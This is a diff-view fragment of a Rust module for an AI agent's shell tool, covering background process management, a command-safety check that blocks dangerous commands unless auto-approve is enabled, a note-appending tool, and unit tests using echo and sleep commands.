Some(sandbox_type.to_string())
|
||||
} else {
|
||||
None
|
||||
},
|
||||
sandbox_denied: false,
|
||||
})
|
||||
}
|
||||
|
||||
/// Get output from a background process
|
||||
pub fn get_output(
|
||||
&mut self,
|
||||
task_id: &str,
|
||||
block: bool,
|
||||
timeout_ms: u64,
|
||||
) -> Result<ShellResult> {
|
||||
let shell = self
|
||||
.processes
|
||||
.get_mut(task_id)
|
||||
.ok_or_else(|| anyhow!("Task {task_id} not found"))?;
|
||||
|
||||
if block && shell.status == ShellStatus::Running {
|
||||
let timeout = Duration::from_millis(timeout_ms.clamp(1000, 600_000));
|
||||
let deadline = Instant::now() + timeout;
|
||||
|
||||
while shell.status == ShellStatus::Running && Instant::now() < deadline {
|
||||
if shell.poll() {
|
||||
break;
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(100));
|
||||
}
|
||||
|
||||
// If still running after timeout
|
||||
if shell.status == ShellStatus::Running {
|
||||
return Ok(shell.snapshot());
|
||||
}
|
||||
} else {
|
||||
shell.poll();
|
||||
}
|
||||
|
||||
Ok(shell.snapshot())
|
||||
}
|
||||
|
||||
/// Kill a running background process
|
||||
pub fn kill(&mut self, task_id: &str) -> Result<ShellResult> {
|
||||
let shell = self
|
||||
.processes
|
||||
.get_mut(task_id)
|
||||
.ok_or_else(|| anyhow!("Task {task_id} not found"))?;
|
||||
|
||||
shell.kill()?;
|
||||
Ok(shell.snapshot())
|
||||
}
|
||||
|
||||
/// List all background processes
|
||||
pub fn list(&mut self) -> Vec<ShellResult> {
|
||||
// Poll all processes first
|
||||
for shell in self.processes.values_mut() {
|
||||
shell.poll();
|
||||
}
|
||||
|
||||
self.processes
|
||||
.values()
|
||||
.map(BackgroundShell::snapshot)
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Clean up completed processes older than the given duration
|
||||
pub fn cleanup(&mut self, max_age: Duration) {
|
||||
let _now = Instant::now();
|
||||
self.processes.retain(|_, shell| {
|
||||
if shell.status == ShellStatus::Running {
|
||||
true
|
||||
} else {
|
||||
shell.started_at.elapsed() < max_age
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
/// Truncate output to `MAX_OUTPUT_SIZE`
|
||||
fn truncate_output(output: &str) -> String {
|
||||
if output.len() <= MAX_OUTPUT_SIZE {
|
||||
output.to_string()
|
||||
} else {
|
||||
let truncated = &output[..MAX_OUTPUT_SIZE];
|
||||
format!(
|
||||
"{}...\n\n[Output truncated at {} characters. {} characters omitted.]",
|
||||
truncated,
|
||||
MAX_OUTPUT_SIZE,
|
||||
output.len() - MAX_OUTPUT_SIZE
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
/// Thread-safe wrapper for `ShellManager`
|
||||
pub type SharedShellManager = Arc<Mutex<ShellManager>>;
|
||||
|
||||
/// Create a new shared shell manager with default sandbox policy.
|
||||
pub fn new_shared_shell_manager(workspace: PathBuf) -> SharedShellManager {
|
||||
Arc::new(Mutex::new(ShellManager::new(workspace)))
|
||||
}
|
||||
|
||||
/// Create a new shared shell manager with a specific sandbox policy.
|
||||
pub fn new_shared_shell_manager_with_sandbox(
|
||||
workspace: PathBuf,
|
||||
policy: ExecutionSandboxPolicy,
|
||||
) -> SharedShellManager {
|
||||
Arc::new(Mutex::new(ShellManager::with_sandbox(workspace, policy)))
|
||||
}
|
||||
|
||||
// === ToolSpec Implementations ===
|
||||
|
||||
use crate::command_safety::{SafetyLevel, analyze_command};
|
||||
use crate::tools::spec::{
|
||||
ApprovalRequirement, ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec,
|
||||
optional_bool, optional_u64, required_str,
|
||||
};
|
||||
use async_trait::async_trait;
|
||||
use serde_json::json;
|
||||
|
||||
/// Tool for executing shell commands.
|
||||
pub struct ExecShellTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for ExecShellTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"exec_shell"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Execute a shell command in the workspace directory. Returns stdout, stderr, and exit code."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> serde_json::Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"command": {
|
||||
"type": "string",
|
||||
"description": "The shell command to execute"
|
||||
},
|
||||
"timeout_ms": {
|
||||
"type": "integer",
|
||||
"description": "Timeout in milliseconds (default: 120000, max: 600000)"
|
||||
},
|
||||
"background": {
|
||||
"type": "boolean",
|
||||
"description": "Run in background and return task_id (default: false)"
|
||||
},
|
||||
"interactive": {
|
||||
"type": "boolean",
|
||||
"description": "Run interactively with terminal IO (default: false)"
|
||||
}
|
||||
},
|
||||
"required": ["command"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![
|
||||
ToolCapability::ExecutesCode,
|
||||
ToolCapability::Sandboxable,
|
||||
ToolCapability::RequiresApproval,
|
||||
]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Required
|
||||
}
|
||||
|
||||
async fn execute(
|
||||
&self,
|
||||
input: serde_json::Value,
|
||||
context: &ToolContext,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let command = required_str(&input, "command")?;
|
||||
let timeout_ms = optional_u64(&input, "timeout_ms", 120_000).min(600_000);
|
||||
let background = optional_bool(&input, "background", false);
|
||||
let interactive = optional_bool(&input, "interactive", false);
|
||||
|
||||
if interactive && background {
|
||||
return Ok(ToolResult::error(
|
||||
"Interactive commands cannot run in background mode.",
|
||||
));
|
||||
}
|
||||
|
||||
// Safety analysis (always run for metadata, but only block when not in YOLO mode)
|
||||
let safety = analyze_command(command);
|
||||
if !context.auto_approve {
|
||||
match safety.level {
|
||||
SafetyLevel::Dangerous => {
|
||||
let reasons = safety.reasons.join("; ");
|
||||
let suggestions = if safety.suggestions.is_empty() {
|
||||
String::new()
|
||||
} else {
|
||||
format!("\nSuggestions: {}", safety.suggestions.join("; "))
|
||||
};
|
||||
return Ok(ToolResult {
|
||||
content: format!(
|
||||
"BLOCKED: This command was blocked for safety reasons.\n\nReasons: {reasons}{suggestions}"
|
||||
),
|
||||
success: false,
|
||||
metadata: Some(json!({
|
||||
"safety_level": "dangerous",
|
||||
"blocked": true,
|
||||
"reasons": safety.reasons,
|
||||
"suggestions": safety.suggestions,
|
||||
})),
|
||||
});
|
||||
}
|
||||
SafetyLevel::RequiresApproval | SafetyLevel::Safe | SafetyLevel::WorkspaceSafe => {
|
||||
// Proceed normally
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Create a shell manager for this execution
|
||||
// If there's an elevated sandbox policy, use it; otherwise use default
|
||||
let mut manager = if let Some(ref policy) = context.elevated_sandbox_policy {
|
||||
ShellManager::with_sandbox(context.workspace.clone(), policy.clone())
|
||||
} else {
|
||||
ShellManager::new(context.workspace.clone())
|
||||
};
|
||||
|
||||
// Pass the elevated policy as override if set
|
||||
let policy_override = context.elevated_sandbox_policy.clone();
|
||||
|
||||
let result = if interactive {
|
||||
manager.execute_interactive(command, None, timeout_ms)
|
||||
} else {
|
||||
manager.execute_with_policy(command, None, timeout_ms, background, policy_override)
|
||||
};
|
||||
|
||||
match result {
|
||||
Ok(result) => {
|
||||
let task_id_str = result.task_id.clone().unwrap_or_default();
|
||||
let output = if interactive {
|
||||
format!(
|
||||
"Interactive command completed (exit code: {:?})",
|
||||
result.exit_code
|
||||
)
|
||||
} else if result.status == ShellStatus::Completed {
|
||||
if result.stdout.is_empty() && result.stderr.is_empty() {
|
||||
"(no output)".to_string()
|
||||
} else if result.stderr.is_empty() {
|
||||
result.stdout.clone()
|
||||
} else {
|
||||
format!("{}\n\nSTDERR:\n{}", result.stdout, result.stderr)
|
||||
}
|
||||
} else if result.status == ShellStatus::Running {
|
||||
format!("Background task started: {task_id_str}")
|
||||
} else {
|
||||
format!(
|
||||
"Command failed (exit code: {:?})\n\nSTDOUT:\n{}\n\nSTDERR:\n{}",
|
||||
result.exit_code, result.stdout, result.stderr
|
||||
)
|
||||
};
|
||||
|
||||
Ok(ToolResult {
|
||||
content: output,
|
||||
success: result.status == ShellStatus::Completed
|
||||
|| result.status == ShellStatus::Running,
|
||||
metadata: Some(json!({
|
||||
"exit_code": result.exit_code,
|
||||
"status": format!("{:?}", result.status),
|
||||
"duration_ms": result.duration_ms,
|
||||
"sandboxed": result.sandboxed,
|
||||
"task_id": result.task_id,
|
||||
"safety_level": format!("{:?}", safety.level),
|
||||
"interactive": interactive,
|
||||
})),
|
||||
})
|
||||
}
|
||||
Err(e) => Ok(ToolResult::error(format!("Shell execution failed: {e}"))),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Tool for appending notes to a notes file.
|
||||
pub struct NoteTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for NoteTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"note"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Append a note to the agent notes file for persistent context across sessions."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> serde_json::Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"content": {
|
||||
"type": "string",
|
||||
"description": "The note content to append"
|
||||
}
|
||||
},
|
||||
"required": ["content"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::WritesFiles]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto // Notes are low-risk
|
||||
}
|
||||
|
||||
async fn execute(
|
||||
&self,
|
||||
input: serde_json::Value,
|
||||
context: &ToolContext,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let note_content = required_str(&input, "content")?;
|
||||
|
||||
// Ensure parent directory exists
|
||||
if let Some(parent) = context.notes_path.parent() {
|
||||
std::fs::create_dir_all(parent).map_err(|e| {
|
||||
ToolError::execution_failed(format!("Failed to create notes directory: {e}"))
|
||||
})?;
|
||||
}
|
||||
|
||||
// Append to notes file
|
||||
let mut file = std::fs::OpenOptions::new()
|
||||
.create(true)
|
||||
.append(true)
|
||||
.open(&context.notes_path)
|
||||
.map_err(|e| ToolError::execution_failed(format!("Failed to open notes file: {e}")))?;
|
||||
|
||||
writeln!(file, "\n---\n{note_content}")
|
||||
.map_err(|e| ToolError::execution_failed(format!("Failed to write note: {e}")))?;
|
||||
|
||||
Ok(ToolResult::success(format!(
|
||||
"Note appended to {}",
|
||||
context.notes_path.display()
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use tempfile::tempdir;
|
||||
|
||||
fn echo_command(message: &str) -> String {
|
||||
format!("echo {message}")
|
||||
}
|
||||
|
||||
fn sleep_command(seconds: u64) -> String {
|
||||
#[cfg(windows)]
|
||||
{
|
||||
let ping_count = seconds.saturating_add(1);
|
||||
let ps_path = r#"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe"#;
|
||||
format!(
|
||||
"\"{ps_path}\" -NoProfile -Command \"Start-Sleep -Seconds {seconds}\" || ping 127.0.0.1 -n {ping_count} > NUL"
|
||||
)
|
||||
}
|
||||
#[cfg(not(windows))]
|
||||
{
|
||||
format!("sleep {seconds}")
|
||||
}
|
||||
}
|
||||
|
||||
fn sleep_then_echo_command(seconds: u64, message: &str) -> String {
|
||||
#[cfg(windows)]
|
||||
{
|
||||
let ping_count = seconds.saturating_add(1);
|
||||
let ps_path = r#"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe"#;
|
||||
format!(
|
||||
"\"{ps_path}\" -NoProfile -Command \"Start-Sleep -Seconds {seconds}; Write-Output {message}\" || (ping 127.0.0.1 -n {ping_count} > NUL && echo {message})"
|
||||
)
|
||||
}
|
||||
#[cfg(not(windows))]
|
||||
{
|
||||
format!("sleep {seconds} && echo {message}")
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sync_execution() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let mut manager = ShellManager::new(tmp.path().to_path_buf());
|
||||
|
||||
let result = manager
|
||||
.execute(&echo_command("hello"), None, 5000, false)
|
||||
.expect("execute");
|
||||
|
||||
assert_eq!(result.status, ShellStatus::Completed);
|
||||
assert!(result.stdout.contains("hello"));
|
||||
assert!(result.task_id.is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_background_execution() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let mut manager = ShellManager::new(tmp.path().to_path_buf());
|
||||
|
||||
let result = manager
|
||||
.execute(&sleep_then_echo_command(1, "done"), None, 5000, true)
|
||||
.expect("execute");
|
||||
|
||||
assert_eq!(result.status, ShellStatus::Running);
|
||||
assert!(result.task_id.is_some());
|
||||
|
||||
let task_id = result
|
||||
.task_id
|
||||
.expect("background execution should return task_id");
|
||||
|
||||
// Wait for completion
|
||||
let final_result = manager
|
||||
.get_output(&task_id, true, 5000)
|
||||
.expect("get_output");
|
||||
|
||||
assert_eq!(final_result.status, ShellStatus::Completed);
|
||||
assert!(final_result.stdout.contains("done"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_timeout() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let mut manager = ShellManager::new(tmp.path().to_path_buf());
|
||||
|
||||
let result = manager
|
||||
.execute(&sleep_command(10), None, 1000, false)
|
||||
.expect("execute");
|
||||
|
||||
assert_eq!(result.status, ShellStatus::TimedOut);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_kill() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let mut manager = ShellManager::new(tmp.path().to_path_buf());
|
||||
|
||||
let result = manager
|
||||
.execute(&sleep_command(60), None, 5000, true)
|
||||
.expect("execute");
|
||||
|
||||
let task_id = result
|
||||
.task_id
|
||||
.expect("background execution should return task_id");
|
||||
|
||||
// Kill it
|
||||
let killed = manager.kill(&task_id).expect("kill");
|
||||
assert_eq!(killed.status, ShellStatus::Killed);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_output_truncation() {
|
||||
let long_output = "x".repeat(50_000);
|
||||
let truncated = truncate_output(&long_output);
|
||||
|
||||
assert!(truncated.len() < long_output.len());
|
||||
assert!(truncated.contains("truncated"));
|
||||
}
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user